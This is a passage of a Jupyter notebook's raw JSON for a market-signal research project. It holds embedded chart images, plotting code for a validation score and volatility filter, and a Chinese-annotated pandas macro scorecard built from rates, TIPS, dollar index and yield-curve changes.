/2zXrl3V/7GOcY9KPht9YtU9SjMZUGvr27ev9p///CfqfijBQYmtqKgofN8VV1yhzZ49W/17//79SjHukksu0QoLC6N+F6MHIKtu3CBNf9JJJ6l/Rz5erBIclOZileAwoqA6j5dsWMFOBvPnz1dKmKmMWewVCVQcy1Isfe6556IUSwcMGJAyiqWJshXURYcPHx71ucB4id69e2vZ2dnV/mwZwI6polhqFRtxn7KGnQxSfZ8yi60i4R5Vd7bCeCJ8b+HCheH71qxZo2yFEWJlwT3K2jbKsegeJWaTUM/KylJzw2LnGkLqHPPyIJWOWWAvvviiklQ3Zo9h7uHo0aO1rVu3Rv1erOHBu+++W6Hk+a5du9RiiOcxZo9h9lns7LHKPl4yYTU73Xnnndqf/vQnLVUxk70qOpR89NFHambg559/rmZkYszBAw88oKUKibTVNddco/3ud79T1xWbHTZGzHmsjTUwlQ4lVrUR9ylz2ymV9ykz2SoS7lF1aysEj/D97777Tlu/fr2aEXz99deX+1q4RyWXjd61yB5lKscZFxazx8q6AUQhLrvsMjVfD4vV4sWL1f0wAObolfV7ZX1QKmucr7/+Ws0vw2MjYoIB3WVhFWOnqp2mTp2qPfHEE1qqYjZ7xTuUGK931KhR2rBhw7QZM2ZoxcXFWqqQSFvl5eVpd911lzZy5EgV8b399tvVfbWxBqbSocSqNuI+ZW47pfI+ZTZbGXCPqltb4WeQzYdjBmcOTlx+fn7c18M9Knls9K5F9igb/lPf5eKEEEIIIYQQQohZMfU4KkIIIYQQQgghpL6h40wIIYQQQgghhMSBjjMhhBBCCCGEEBIHOs6EEEIIIYQQQkgc6DgTQgghhBBCCCFxoONMCCGEEEIIIYTEgY4zIYQQQgghhBASBzrOhBBCCCGEEEJIHOg4E0IIIYQQQgghcaDjTAghhBBCCCGExIGOMyGEEEIIIYQQEgc6zoQQQgghhBBCiJTP/weh68lMi1r5CQAAAABJRU5ErkJggg==", + "text/plain": [ + "
" + ] + }, + "metadata": {}, + "output_type": "display_data" + } + ], + "source": [ + "fig, ax = plt.subplots(2, 1, figsize=(12, 7), sharex=True)\n", + "ax[0].plot(val.index, val[\"valid_score\"], label=\"valid_score\", color=\"#4f46e5\")\n", + "ax[0].axhline(2, linestyle=\"--\", color=\"#94a3b8\", label=\"threshold=2\")\n", + "ax[0].set_title(\"Signal Validation Score\")\n", + "ax[0].legend(loc=\"upper left\")\n", + "\n", + "ax[1].plot(val.index, val[\"vol20_ann\"], label=\"vol20_ann\", color=\"#0ea5e9\")\n", + "ax[1].plot(vol_q.index, vol_q, label=\"vol 75% quantile\", color=\"#f59e0b\")\n", + "ax[1].set_title(\"Volatility Filter\")\n", + "ax[1].legend(loc=\"upper left\")\n", + "plt.show()" + ] + }, + { + "cell_type": "markdown", + "id": "32448f59", + "metadata": {}, + "source": [ + "## 3) 宏观过滤层:6 指标记分卡\n", + "\n", + "### 逻辑说明(简化研究版)\n", + "\n", + "以 5 日变化来做方向判断,输出 `macro_score`:\n", + "\n", + "- `IRX` 上升:逆风(-1),下降:顺风(+1)\n", + "- `TNX` 上升:逆风(-1),下降:顺风(+1)\n", + "- `TIP` 上升:顺风(+1),下降:逆风(-1)\n", + "- `DXY` 上升:逆风(-1),下降:顺风(+1)\n", + "- `Curve`(TYX-FVX)扩大:顺风(+1),收窄:逆风(-1)\n", + "\n", + "> 这是研究框架的 V0 打分,后续可以细化为幅度分层与阈值区间。" + ] + }, + { + "cell_type": "code", + "execution_count": 7, + "id": "6ff45a79", + "metadata": {}, + "outputs": [ + { + "name": "stdout", + "output_type": "stream", + "text": [ + "macro score today: 3\n", + "IRX 1\n", + "TNX -1\n", + "TIP 1\n", + "DXY 1\n", + "Curve 1\n", + "Name: 2026-04-10 00:00:00, dtype: int64\n" + ] + }, + { + "name": "stdout", + "output_type": "stream", + "text": [ + "/var/folders/96/_n1lf8k53dxg2d2mxxmwwjl80000gn/T/ipykernel_21785/89507757.py:2: FutureWarning: The default fill_method='pad' in DataFrame.pct_change is deprecated and will be removed in a future version. Either fill in any non-leading NA values prior to calling pct_change or specify 'fill_method=None' to not fill NA values.\n", + " chg5 = m.pct_change(5)\n" + ] + } + ], + "source": [ + "m = macro.copy()\n", + "chg5 = m.pct_change(5)\n", + "\n", + "macro_score = pd.Series(0, index=m.index, dtype=float)\n", + "macro_detail = pd.DataFrame(index=m.index)\n", + "\n", + "macro_detail[\"IRX\"] = np.where(chg5[\"^IRX\"] <= 0, 1, -1)\n", + "macro_detail[\"TNX\"] = np.where(chg5[\"^TNX\"] <= 0, 1, -1)\n", + "macro_detail[\"TIP\"] = np.where(chg5[\"TIP\"] >= 0, 1, -1)\n", + "macro_detail[\"DXY\"] = np.where(chg5[\"DX-Y.NYB\"] <= 0, 1, -1)\n", + "\n", + "curve = m[\"^TYX\"] - m[\"^FVX\"]\n", + "curve_chg = curve.diff(5)\n", + "macro_detail[\"Curve\"] = np.where(curve_chg >= 0, 1, -1)\n", + "\n", + "macro_score = macro_detail.sum(axis=1).rename(\"macro_score\")\n", + "\n", + "macro_today = pd.concat([macro_detail, macro_score], axis=1).dropna().iloc[-1]\n", + "print(\"macro score today:\", int(macro_today[\"macro_score\"]))\n", + "print(macro_today[[\"IRX\", \"TNX\", \"TIP\", \"DXY\", \"Curve\"]])" + ] + }, + { + "cell_type": "code", + "execution_count": 9, + "id": "8cf60cb3", + "metadata": {}, + "outputs": [ + { + "data": { + "image/png": "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